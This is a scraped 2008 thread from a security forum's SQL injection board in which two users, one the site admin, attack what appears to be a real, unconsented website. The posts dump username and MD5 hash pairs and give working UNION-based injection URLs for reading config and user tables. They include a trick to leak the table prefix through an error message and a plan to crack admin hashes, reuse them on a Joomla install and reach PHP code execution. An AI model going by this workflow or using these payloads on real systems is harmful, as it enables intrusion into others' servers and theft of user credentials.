Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 59
Members: 0
Total: 59
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> xss? Goto page Previous1, 2, 3, 4Next
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Sun Nov 09, 2008 2:55 am Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




btw the some of the results are..
Code:
chahrazad:9fd8301ac24fb88e65d9d7cd1dd1b1ec
missquemado:30f4e146c8759e8c570971e28bbf42c7
Shebekia:256e0e775a10c23fb187d4482dfb8641
aardbei:e631763418d12235f45feae6e3394bb0
Chadiaatje:88a6a0262491103f0755d4d3f5abdb53
knaakbert:f31227b74bac22d2c79b8cc8da7d82a7
Noredine:ba6cf8ef30cd268ba20ed90032072134


are these the real usernames ? :S
i dont think those usernames exist :S :S
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 3:04 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Id2 admin is default admin, created by installer. There can be more admins and have seen foums, where actually id2 user is deleted. But it's easy to "filter out" users with admin rights, because such info is located in same users table ...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 09, 2008 3:10 am Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




sorry man but.. ive checked those usernames on forum and they do NOT exist..

wtf?
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 3:13 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




There can be more than one forum installed on same database (with different table prefix) or in different database. If you can find, where is located this specific forum and if you can crack admin's hash, then it may be the way to the php code execution level in target server ...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 09, 2008 3:26 am Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




ok . now i'm starting to feel a little confused Razz ..
this might be the passwords to some other forum ?
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 3:39 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try this in order to reveal forum relative path:

Code:

http://www.xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,config_value,3,4,5,6,7,8,9,10+FROM+phpbb_config+WHERE+config_name=0x7363726970745f70617468



... and server name:

Code:

http://www.xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,config_value,3,4,5,6,7,8,9,10+FROM+phpbb_config+WHERE+config_name=0x7365727665725f6e616d65


Last edited by waraxe on Sun Nov 09, 2008 3:55 am; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 09, 2008 3:43 am Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE config_name=0x7363726970745f70617468' at line 1

:S
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 3:55 am Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




with
Code:
/index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,config_name,config_value),3,4,5,6,7,8,9,10+FROM+phpbb_config


config_id:1

maybe this might be useful ?
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 3:57 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I fixed those queries, try them now. Anyway, i'm offline now, it's 5:56 AM here where i live Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 09, 2008 3:58 am Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




same time here Razz

gnite
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 2:49 pm Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




soooooo........ Razz

i found
Code:
www.****.nl
/forum/


but when i try
Code:
www.****.nl/forum/
there is no forum installed there Razz

well thats weird

[[ edited by waraxe - no sensitive info posting!! ]]
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 3:10 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




It means, that specific forum tables are leftover from phpbb installation, that is no longer in use. If you look at that website's index page, then you can find, that it's based now on Joomla CMS.

So, what you can do right now:

1. fetch phpbb admin hash(es), try to reveal plaintext password and there is a chance, that it's reused in Joomla.

2. try to read Joomla database - default users table is "jos_users". Obtain some admin hashes and try to crack them. Idea is to get Joomla's admin access level, which can finally lead to arbitrary php code execution level.

3. you can try this against target's phpbb installation:

Code:

http://localhost/phpbb.2.0.20/memberlist.php?start=-1


If you are lucky, then error message shows up:

Code:

Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php


... revealing phpbb table prefix Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 09, 2008 3:33 pm Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




and hell yeah im lucky Razz

ok now.. its apol_forum_users

so..
Code:
http://xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,username,user_password,user_level),3,4,5,6,7,8,9,10+FROM+apol_forum_users+ORDER+BY+id+ASC+LIMIT+1,1


i used user_level (admin is 1) ..
but i tried the 1st 5-6 usernames but none of them has user level 1 :S
View user's profile Send private message
PostPosted: Sun Nov 09, 2008 3:39 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Code:

http://xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,username,user_password,user_level),3,4,5,6,7,8,9,10+FROM+apol_forum_users+WHERE+user_level=1+ORDER+BY+id+ASC+LIMIT+0,1
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 09, 2008 3:45 pm Reply with quote
skmpz
Advanced user
Advanced user
Joined: Oct 11, 2008
Posts: 169
Location: Cyprus




oh cool..

thx a million waraxe Smile
View user's profile Send private message
xss?
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 3 of 4
Goto page Previous1, 2, 3, 4Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds